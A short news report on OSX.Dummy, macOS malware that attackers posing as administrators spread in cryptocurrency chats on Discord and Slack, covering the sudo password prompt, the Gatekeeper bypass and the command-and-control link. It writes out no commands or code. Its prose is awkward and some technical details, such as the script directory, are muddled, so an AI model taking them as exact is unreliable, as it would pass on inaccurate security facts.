A recent threat has been unveiled by security researchers that target Mac owners who discuss cryptocurrencies over the chat websites which include names such as Discord and Slack. As per the information provided by Remco Verhoef, Security Researcher, multiple attacks from the malware have been noted originating in the chats that are related to cryptocurrency over popular official chat platforms Discord or Slack. The said hackers manage to infiltrate these groups while pretending as the key administrators while sharing small snippets that result in the execution of this malicious binary code when downloaded.
Patrick Wardle from the Digital Security said in his post over Objective-See dated 29th June that these hackers are asking the users to self-inflict their systems. If somehow someone gets into this obvious trap and manages to download these snippets, the “OSX.Dummy” gets access to the tmp/macOS/script directory to access the data inside the system. The file sent via chats is a hefty one with 34MB size.
After the execution of the code, the malware tried to run the sudo command through a Terminal. This can only be established when the user maintains a connection to administrator account which is protected by a password. This is followed by a prompt message for the victim to enter a relevant password which allows the malware to gain rights to root access.
Even after the OSX.Dummy does not carry a sign; it manages to cleverly avoid the Gatekeeper which is a software based on macOS to stop the execution of any file that isn’t signed. This happens because of the victim who downloads this binary code file directly via the terminal commands. This effectively bypasses the protection provided by Gatekeeper establishing the payload.
In the initial phase, the Virus Total had scored zero detection from a total of 60. This means that the file wasn’t recognized as malicious by the AVs. However, while it was being written, 11 anti-virus programs from 60 managed to recognize it which comes as great news for the unsuspecting users.
Even after being described as a primitive virus, the OSX.Dummy can easily inflict a massive amount of damage into a system of the person who is naïve enough to go ahead and download this binary file. The malware can easily connect to C&C server of the adversary which essentially allows system-overtake by the bad actors to steal the private information.